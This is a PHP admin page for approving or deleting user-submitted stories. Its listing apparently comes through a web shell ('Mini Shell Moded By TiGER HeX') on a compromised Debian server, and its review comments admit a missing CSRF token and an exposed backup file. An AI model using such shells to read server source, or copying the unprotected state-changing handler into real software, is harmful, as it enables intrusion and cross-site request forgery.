Mini Shell Moded By TiGER HeX
Linux midnightridazz 4.19.0-11-cloud-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64
//var/www/ridazz/admin/eventApprove.php~
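<?php
/**
 * Admin moderation queue for unapproved stories.
 *
 * On a request carrying `approve` or `delete`, every request key of the form
 * `story_<id>` selects a story: approve sets `approved = 1` in 50mm_stories,
 * delete removes the story row and its rows in 50mm_embed. The page then
 * lists all stories with `approved = 0`, each with a thumbnail, a preview
 * link, an optional edit link and a selection checkbox.
 *
 * Access control: the page requires has_permission(<script name>); deleting
 * additionally requires has_permission("eventDelete"), enforced here on the
 * server and not only by hiding the Delete button.
 *
 * NOTE(review): the form carries no anti-CSRF token and the handler reads
 * $_REQUEST, so a state change can be triggered by a cross-site GET or POST
 * made with a logged-in admin's session. Add a per-session token and accept
 * POST only once the session helper's API is confirmed.
 * NOTE(review): this listing was served from a "~" editor backup copy; such
 * copies inside the web root can expose source and should be removed.
 */
include_once('../includes/static/configure.php');
include_once('../includes/static/util.php');
include_once('../includes/static/dbcon2.php');
include_once('../includes/static/gdimg.php');
include_once('../includes/static/sessions.php');
include_once('includes/static/util.php');
include_once('includes/appTop2.php');

$page_id = str_replace(".php", "", basename($_SERVER['PHP_SELF']));
if (!has_permission($page_id)) {
    die("You don't have permission to view this page!");
}

// Approve takes precedence when both buttons' names are present.
$do_approve = isset($_REQUEST['approve']);
$do_delete = !$do_approve && isset($_REQUEST['delete']);

// The Delete button is only rendered for users holding "eventDelete"; the
// handler must apply the same rule, otherwise a hand-made request deletes.
if ($do_delete && !has_permission("eventDelete")) {
    die("You don't have permission to delete stories!");
}

if ($do_approve || $do_delete) {
    // Loop through all request parameters and act on the selected stories.
    // foreach/preg_match replace each()/eregi(), which no longer exist in
    // current PHP versions.
    foreach ($_REQUEST as $key => $value) {
        // Only an exact "story_<digits>" key is accepted, so nothing but a
        // digit string can reach the SQL text below.
        // NOTE(review): assumes story_id is a non-negative integer; confirm
        // against the schema.
        if (!preg_match('/^story_([0-9]+)$/D', (string) $key, $matches)) {
            continue;
        }
        $story_id = $matches[1];

        if ($do_approve) {
            $sql = "UPDATE 50mm_stories SET approved = 1 WHERE story_id = '" . $story_id . "'";
            if (!($result = $db->sql_query($sql))) {
                // Log the driver message instead of printing it to the browser.
                $sql_error = $db->sql_error();
                error_log('eventApprove: ' . $sql_error['message']);
                die('A database error occurred.');
            }
        } else {
            $sql = "DELETE FROM 50mm_stories WHERE story_id = '" . $story_id . "'";
            if (!($result = $db->sql_query($sql))) {
                $sql_error = $db->sql_error();
                error_log('eventApprove: ' . $sql_error['message']);
                die('A database error occurred.');
            }
            $sql = "DELETE FROM 50mm_embed WHERE story_id = '" . $story_id . "'";
            if (!($result = $db->sql_query($sql))) {
                $sql_error = $db->sql_error();
                error_log('eventApprove: ' . $sql_error['message']);
                die('A database error occurred.');
            }
        }
    }
}

include_once('includes/header.php');
?>
<form action="<?php echo htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES); ?>" method="post" enctype="multipart/form-data">
<?php
// content
$sql = "SELECT s.story_id,s.story_title,s.story_body,s.entry_time FROM 50mm_stories s WHERE approved = 0";
if (!($result = $db->sql_query($sql))) {
    $sql_error = $db->sql_error();
    error_log('eventApprove: ' . $sql_error['message']);
    die('A database error occurred.');
}

$modrows = array();
while ($row = $db->sql_fetchrow($result)) {
    $id = $row['story_id'];
    // Escaped forms of the id for the two contexts it is written into.
    $id_attr = htmlspecialchars($id, ENT_QUOTES);
    $id_url = htmlspecialchars(urlencode($id), ENT_QUOTES);

    // NOTE(review): title and body are user-submitted text; confirm that
    // get_trim_string()/get_table() HTML-escape them before output.
    $row['story_body'] = get_trim_string($row['story_body']);
    $row['story_title'] = get_trim_string($row['story_title']);

    $imgsql = "SELECT image FROM 50mm_embed WHERE story_id = '$id' LIMIT 1";
    if (!($imgresult = $db->sql_query($imgsql))) {
        $sql_error = $db->sql_error();
        error_log('eventApprove: ' . $sql_error['message']);
        die('A database error occurred.');
    }
    $imgrow = $db->sql_fetchrow($imgresult);
    // A story may have no embed row; treat that as "no image".
    $image_name = ($imgrow && isset($imgrow['image'])) ? $imgrow['image'] : '';

    $row['image'] = "no image on disk";
    if ($image_name !== '' && is_file(ROOT_DIR . STORY_LIMG_DIR . $image_name)) {
        // getimagesize() returns false for a file it cannot parse; a zero
        // dimension would otherwise cause a division by zero below.
        $img_info = getimagesize(ROOT_DIR . STORY_LIMG_DIR . $image_name);
        if ($img_info !== false && max($img_info[0], $img_info[1]) > 0) {
            // Scale the longer side down to 50 pixels.
            $scale = max($img_info[0], $img_info[1]) / 50;
            $w = round($img_info[0] / $scale);
            $h = round($img_info[1] / $scale);
            // urlencode() leaves no quote characters in the JS string literal.
            $js = "popImage('" . urlencode(STORY_LIMG_DIR . $image_name) . "','" . (int) $img_info[0] . "','" . (int) $img_info[1] . "');";
            $row['image'] = "<img src=\"" . htmlspecialchars(STORY_SIMG_DIR . $image_name, ENT_QUOTES) . "\" border=\"0\" width=\"$w\" height=\"$h\" style=\"cursor:pointer;\" onClick=\"" . $js . "\">";
        }
    }

    // Reset per row so one story's links never carry over to the next.
    $xtras = array();
    $xtras['view'] = "<a href=\"#\" onClick=\"window.open('viewStory.php?storyId=" . $id_url . "','storyPreview');\">view</a>";
    if (has_permission("eventEdit")) {
        $xtras['edit'] = "<a href=\"eventEdit.php?storyId=" . $id_url . "\">edit</a>";
    }
    if (has_permission("eventDelete")) {
        $xtras['approve \ delete'] = "<input type=\"checkbox\" name=\"story_" . $id_attr . "\" value=\"\">";
    } else {
        $xtras['approve'] = "<input type=\"checkbox\" name=\"story_" . $id_attr . "\" value=\"\">";
    }

    $all = array_merge($row, $xtras);
    array_push($modrows, $all);
}
echo(get_table($modrows));
?>
<input type="checkbox" name="selectAll" onClick="return checkUncheckAll(this.form);"> Select/Deselect All<br>
<?php
if (has_permission("eventDelete")) {
    $submit = "<input class=\"button\" type=\"submit\" name=\"delete\" value=\"Delete Selected\" onClick=\"return validateDelete(this.form);\"> ";
    echo $submit;
}
?>
<input class="button" type="submit" name="approve" value="Approve Selected">
</form>
<?php
include_once('includes/footer.php');
include_once('includes/appBottom.php');
?>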